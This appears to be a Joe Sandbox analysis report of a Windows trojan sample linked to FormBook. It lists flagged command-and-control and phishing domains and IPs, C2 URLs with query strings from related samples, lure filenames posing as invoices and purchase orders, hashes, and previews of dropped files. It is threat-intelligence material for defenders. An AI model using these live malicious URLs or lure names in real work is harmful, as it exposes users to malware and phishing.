                                                                                                                                                        https://github.com/phongcao/image-pipeline-windows)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.klxcv.xyz/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                          unknown
                                                                                                                                                          http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFmsrundll32.exe, 00000006.00000002.3699669578.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3699669578.00000000004C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                          unknown
                                                                                                                                                          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.townstart.shop/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            http://www.xuangesmd.comReferer:explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://github.com/microsoft/testfx)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              75.2.115.196
                                                                                                                                                              www.wokeeducationhateskids.comUnited States
                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                              108.186.24.175
                                                                                                                                                              www.sklm888.comUnited States
                                                                                                                                                              54600PEGTECHINCUStrue
                                                                                                                                                              154.17.26.8
                                                                                                                                                              www.xuangesmd.comUnited States
                                                                                                                                                              54574DMITUStrue
                                                                                                                                                              34.149.87.45
                                                                                                                                                              td-ccm-neg-87-45.wixdns.netUnited States
                                                                                                                                                              2686ATGS-MMD-ASUStrue
                                                                                                                                                              104.17.158.1
                                                                                                                                                              ssl1.prod.systemdragon.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                              3.33.130.190
                                                                                                                                                              glocraze.comUnited States
                                                                                                                                                              8987AMAZONEXPANSIONGBtrue
                                                                                                                                                              198.177.124.40
                                                                                                                                                              www.klxcv.xyzUnited States
                                                                                                                                                              395681FINALFRONTIERVGtrue
                                                                                                                                                              103.224.212.216
                                                                                                                                                              www.umertazkeer.comAustralia
                                                                                                                                                              133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                              Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                                              Analysis ID:1336550
                                                                                                                                                              Start date and time:2023-11-03 12:33:39 +01:00
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 11m 34s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:36
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample file name:SecuriteInfo.com.FileRepMalware.16340.31219.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.evad.winEXE@12/3@12/8
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 126
                                                                                                                                                              • Number of non-executed functions: 171
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.16, 23.218.218.190, 23.218.218.158, 23.218.218.148
                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, www.msftncsi.com.edgesuite.net, ocsp.digicert.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ncsi-geo.trafficmanager.net, www.msftconnecttest.com, l-0007.l-msedge.net, config.edge.skype.com, a1961.g2.akamai.net
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              12:34:51API Interceptor6547937x Sleep call for process: explorer.exe modified
                                                                                                                                                              14:30:42API Interceptor6809209x Sleep call for process: rundll32.exe modified
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              75.2.115.196#U00f6deme_talimat#U0131.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.gamebaidoithuong81.net/dz01/?uVdD1=YMOmdhSwndWCdTRrZByHpwsNCsdFmAkVHs1I8KDVv6p76JxAIuTZWEQkjCszFbHRIEPV&U2JH4=MtxdApUP-NXPklNP
                                                                                                                                                              VCpYN6lZjV.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • www.52iwin.win/ge06/?GzrL=3xoI/B6CQoLdvz6I1QncmX9MP1HhWXk9QV/Cy1061GZM9Tl3nu1AsvBYpd4XaAt8mBsC&zHO=-ZddoRKxcZ8d2
                                                                                                                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtfGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • www.52iwin.win/ge06/?M4utZ=Nbv4vNO&Qntd4=3xoI/B6CM4PZvTyP3QncmX9MP1HhWXk9QVnSu2o7xmZN9iJxg+kM6r5aq4UrBgZPpA5yZg==
                                                                                                                                                              sipari#U015f_onay#U0131.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • www.gamebaidoithuong81.net/dz01/?jFNl2n5=YMOmdhSwndWCdTRrZByHpwsNCsdFmAkVHs1I8KDVv6p76JxAIuTZWEQkjBMsO7XpSjyf&lZ3=p2MptpHXqrVlbPUp
                                                                                                                                                              Payment_Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx
                                                                                                                                                              F#U0130YAT_TALEB#U0130-SALTIKMAKINA__AS_BESTKALIP_A.S.exeGet hashmaliciousFormBook, RedLineBrowse
                                                                                                                                                              • www.hybridrate.com/bz24/
                                                                                                                                                              Fiyat_Teklif_Erymetal_A.s_MKLoO8887.exeGet hashmaliciousFormBook, RedLineBrowse
                                                                                                                                                              • www.hybridrate.com/bz24/
                                                                                                                                                              SecuriteInfo.com.Variant.Jaik.39057.4222.31519.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • hostinga.imagecross.com/image-hosting-17/3keny.jpeg
                                                                                                                                                              ir4uOmf7Ic.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • www.92dbxvhr.xyz/be03/?YfxhA2W=yZ2tR2aIub077a/vy7woE3/H7uql4cqd+BdZnWiuASMC0GCzjDrlE7a20IxpmNqzo2aw&5jutZ=0txPa
                                                                                                                                                              PO-371240523.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.loiioo1.site/ca82/?W4=aDgxtMAVqgZllSWLFyeRl6lh+EK1aUkDjIUC5rmnbdl5K86wqQ19w1O/sKDk3IY+RFc/&u0DH=aL3TSZm0nZvtOrTp
                                                                                                                                                              PO_383822.docGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.batbatbat.net/sd03/?f4G0dr7=+n333/Os3+ZENO7ZV6T7++SqVJMU9gaNd8RrIz+AORJhv5tCRvqdHL7xPS0FOmBOCaqBcA==&fpEL6P=fR-XynpxGjH0rtQp
                                                                                                                                                              copy_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.dp77.shop/he2a/?nTthCt=Nb/FKU1zdQBN+CSQ9lNkfNv7NMoqSEbAcLfmG2wKmrccvHfopsPLt/BWV5dbdU3xRW6p&s4ND=W48hC
                                                                                                                                                              php.iniGet hashmaliciousUnknownBrowse
                                                                                                                                                              • pitch.events/
                                                                                                                                                              Arabian Aluminium Products Co. L.L.C-pdf-.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.ecorpay.biz/a09e/?4h8Pe=v0DpmlQHSdUdP6np&fFNH=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/DDpGJPNO8cw
                                                                                                                                                              PO 700125-pdf-.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.ecorpay.biz/a09e/?z8nxQx=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/Aj5Jof1QZ13&lVnDHL=CpNlV2B8kD1P-t
                                                                                                                                                              VCgLc3XXth.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.hr-energys.com/tc10/?Z4=JHTmh3EWKTPKf1cHLPJvR2ZFoVNC9AR7o7RzP26IdifzzOhK0sieS8LaPvWkJY6zfCOxZ5wHpw==&UZWh=5jfLYpLX3XFpgtE
                                                                                                                                                              LANXESS India Private Limited-pdf-scan-copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.ecorpay.biz/a09e/?5j28vRex=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/Aj5Jof1QZ13&b2=bRbDkTNp5ZeX
                                                                                                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • www.bestshedstobuy.com/my24/?VlWD=+J//Ny9ZhLFW2AjEdvcSUPlox6uw5eu3qrMWbYLHwLIGOJmoe0z5z197zCtVZDfyHS8b&3ff=L2MtR2j8RXGxlFx
                                                                                                                                                              SecuriteInfo.com.Variant.Jaik.110210.1452.31617.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • www.infotech.wiki/w14d/?c2Mhmv8=dl1tlOpb+xogHJBPJW+gVBSyFLzCo7G091N/hBKFN5v+H4cuYwRfI9nBHU5MN+t+4Xb8&k2Mx=6ll4iRq0VPkL_V
                                                                                                                                                              OUTSTANDING PI770100059 SOA OCT 2022.IMGGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • www.vnsuda.lol/gkr4/?pVvPi=jRwH&9rW=i9EYUB6T86BTY8cTtp+oqcAuy+2swFSPHzn9C0Z+4aDcJRNIbQa89iKj2Vm4IUHpJGzLXK064b2B1kQWf+fbpqzjbVwvy3ABTg==
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              ssl1.prod.systemdragon.comIMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 104.17.157.1
                                                                                                                                                              wLlREXsA9M.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 104.17.157.1
                                                                                                                                                              sOjxIU25DP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 104.17.157.1
                                                                                                                                                              hi38VYWujz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 104.17.158.1
                                                                                                                                                              Payment_document.docx.docGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 104.17.158.1
                                                                                                                                                              E-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 104.17.157.1
                                                                                                                                                              E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 104.17.158.1
                                                                                                                                                              PO_3534272.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 104.17.157.1
                                                                                                                                                              td-ccm-neg-87-45.wixdns.netPO_876-1057.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              RFQ_GEC18.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              SecuriteInfo.com.Variant.Jaik.195228.28080.29351.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              vcQaXrBHRi.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              RMW-2422.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              XHK098909PO00.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              http://www.thewhiteorchidspa.comGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              Tjn6ml70u4.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              SecuriteInfo.com.Trojan.Inject4.59820.201.31258.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              RFQ_GEC-14.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              30102023_678096234678909750.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              FedEx_AWB#817443848264.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              27102023_267897635409878.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              Purchase_Order_1021234.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              A0719_016_9900_F5_001_D_A_1M_230714.pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              https://www.assetmapping.events/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              https://www.assetmapping.events/gis-local-govt-asset-mgmtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              http://www.sharepoint-dahler.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.9855.30076.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              obizx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 34.149.87.45
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              PEGTECHINCUSDOCUMENTOS_FINALES_PARA_ENV#U00cdOS_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 108.186.24.219
                                                                                                                                                              2jNbOCyBG1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 137.175.17.172
                                                                                                                                                              Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              SecuriteInfo.com.Variant.Jaik.195228.28080.29351.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 107.148.223.82
                                                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.2512.24045.1012.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              Revised_invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              proforma_invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              SecuriteInfo.com.Trojan.Inject4.59820.22477.20906.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              Shipping_documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              876-1057.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.149.182.214
                                                                                                                                                              Purchase_Order_No.1364.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 142.4.124.174
                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.18902.20315.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              SecuriteInfo.com.Trojan.Inject4.59820.201.31258.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              Purchase_Order_No.1364.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 142.4.124.174
                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.31302.3536.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 107.148.95.217
                                                                                                                                                              z0r0.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 156.243.156.244
                                                                                                                                                              sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 156.243.156.240
                                                                                                                                                              1.elfGet hashmaliciousXorDDoSBrowse
                                                                                                                                                              • 142.0.138.41
                                                                                                                                                              #U00f6deme_talimat#U0131.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 142.4.119.230
                                                                                                                                                              b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 154.84.242.243
                                                                                                                                                              AMAZON-02UShttp://communitycampus.onlineGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.225.214.113
                                                                                                                                                              1054696.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 18.154.227.100
                                                                                                                                                              SWIFT_COPY_HSBC_BANK-97475.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 13.251.234.246
                                                                                                                                                              SWIFT_COPY_HSBC_BANK-97472.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                              • 13.251.234.246
                                                                                                                                                              bRio.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                              • 52.52.52.213
                                                                                                                                                              JtRzcZTu3S.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 3.177.104.12
                                                                                                                                                              arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 18.191.144.102
                                                                                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 3.30.104.229
                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 52.88.208.112
                                                                                                                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.222.143.185
                                                                                                                                                              bRhZ.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                              • 13.52.90.244
                                                                                                                                                              bRhY.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                              • 54.219.247.190
                                                                                                                                                              http://uropygial-daughters.000webhostapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 99.84.191.41
                                                                                                                                                              https://censorial-thyristor.000webhostapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 99.84.191.77
                                                                                                                                                              https://mannedroll.com/0/0/0/fce32451eb1dc7beb0219bbe608d4403/0/43811/184525/24Get hashmaliciousPhisherBrowse
                                                                                                                                                              • 108.138.85.31
                                                                                                                                                              http://az7technoloan.com/cl/0_mt/10/1603/3039/0/0Get hashmaliciousPhisherBrowse
                                                                                                                                                              • 54.171.111.121
                                                                                                                                                              bRhS.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                              • 52.8.11.142
                                                                                                                                                              https://zvahgbnsgv.chilhillswe.ru/flzjdl/#bGlhbmRhLnN0b2VsQG1sY2luc3VyYW5jZS5jb20uYXU=Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 3.162.103.64
                                                                                                                                                              https://us.docs.wps.com/module/common/loadPlatform/?sa=16&st=0t&sid=sICb8ypVCkJ3kqQY&v=v2Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 3.162.125.67
                                                                                                                                                              HR_ Payout list for next Cored.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 52.92.36.65
                                                                                                                                                              No context
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\xheuzyg.exeNew_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2340
                                                                                                                                                                Entropy (8bit):5.157154166881333
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:RJlU9Wt/hZm1hZo5hZCghHhmqvv8zqURAQ7UDXX+yciW6l6:RJlU9Wt/i1M5+ghHhmmv8zqURl0m
                                                                                                                                                                MD5:D422204526D12E81FCF5B83E198A8F71
                                                                                                                                                                SHA1:D51EC39B0F2220F134671B704C13FD262928B803
                                                                                                                                                                SHA-256:17544DFBED5E4811EBEB099BEC53D0BEC4ED8873D1F8398D7FA2ADFCAC6AECB9
                                                                                                                                                                SHA-512:E027626FA3A68E8AB1DF6F2D77A8A5F687297F2A580E1723A34A517E8C46AEDC60C844D3676010D225B2954B8BA9A1E7723CB334A02399D1D2F30028C8C85B89
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:2023-11-03 14:33:09.725+01:00 [3840:002] [Info] [RegularSkypeApplication] App constructor: process started. App version:14.53.77.0..2023-11-03 14:33:10.866+01:00 [3840:002] [Info] [RegularSkypeApplication] OnBackgroundActivated d214765b-d320-4e35-9c20-bc9e07f1fb5f..2023-11-03 14:33:11.100+01:00 [3840:002] [Info] [ExternalApi] Notifications enabled..2023-11-03 14:33:11.241+01:00 [3840:002] [Info] [RegularSkypeApplication] EnsureReactNativeHostStarted: no bytecode file present to delete..2023-11-03 14:33:11.288+01:00 [3840:002] [Info] [RegularSkypeApplication] EnsureReactNativeHostStarted: starting host..2023-11-03 14:33:11.304+01:00 [3840:002] [Info] [RNW] ReactInstanceManager: constructor..2023-11-03 14:33:11.366+01:00 [3840:002] [Info] [RegularSkypeApplication] EnsureReactNativeHostStarted: host started..2023-11-03 14:33:11.366+01:00 [3840:002] [Info] [RNW] ReactInstanceManager: TryGetReactContextAsync - entry..2023-11-03 14:33:11.366+01:00 [3840:002] [Info] [RNW] ReactInstanceManager
                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):245248
                                                                                                                                                                Entropy (8bit):6.483524898429163
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:tRu/iIAZFP+1L72ohpG6oHqB8Bp6XQAOA5e:PuRAZFP+H06oHqB8Bp6Aae
                                                                                                                                                                MD5:25D54D83B6D68CAF9DE7655FF5E33651
                                                                                                                                                                SHA1:C5D7F7CF3E48743345E8F3BF67FE786E9A4B4FDA
                                                                                                                                                                SHA-256:B5D248548FAEDE30D47AA97B068B3BD63D39EA0C69D965FEE54AD1ACCF51495B
                                                                                                                                                                SHA-512:9DB3220C6AE5AE2EA92EFA979FF2B92C38CEEF0CE6FD93C64D670DDA8AD88A6E1DBAEC059BB25E1AC7FC3714A0DEFCFC014B955E687C39531842AA6A77C68586
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: New_order_98987006305#.doc, Detection: malicious, Browse
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$.N.J.N.J.N.J...I.C.J...O...J..I.Y.J..O.t.J..N.l.J...N.Y.J...K.W.J.N.K...J...C.O.J...H.O.J.RichN.J.........PE..L...|!Ce.....................>....................@.......................................@.................................$.................................... ...l.......................l.......l..@...............X............................text...?........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.tls................................@....reloc... ......."..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):209953
                                                                                                                                                                Entropy (8bit):7.992988895917002
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:6144:N4ic9mhPFciEJh7L1o+NTHvqmMXX2daCDl:Nc9mhPGh7LRRomE2
                                                                                                                                                                MD5:4F96456988AC17FE0F73C36FC52A2ABF
                                                                                                                                                                SHA1:20A30FB41B445CD358F05BA6F69980F2EC56F020
                                                                                                                                                                SHA-256:3FFE9B918720B5745D8967022BDE16F154330A32505958CA57E1B87332ADE644
                                                                                                                                                                SHA-512:FFD6EC0E48D3D09D784BE41CB7553AFD88758ACD3DD88879B4B9BE969C85114CB1F340A29113EF4E6C922E58D7EC510C36EF4E5B5CC08195437475B90FD52778
                                                                                                                                                                Malicious:false
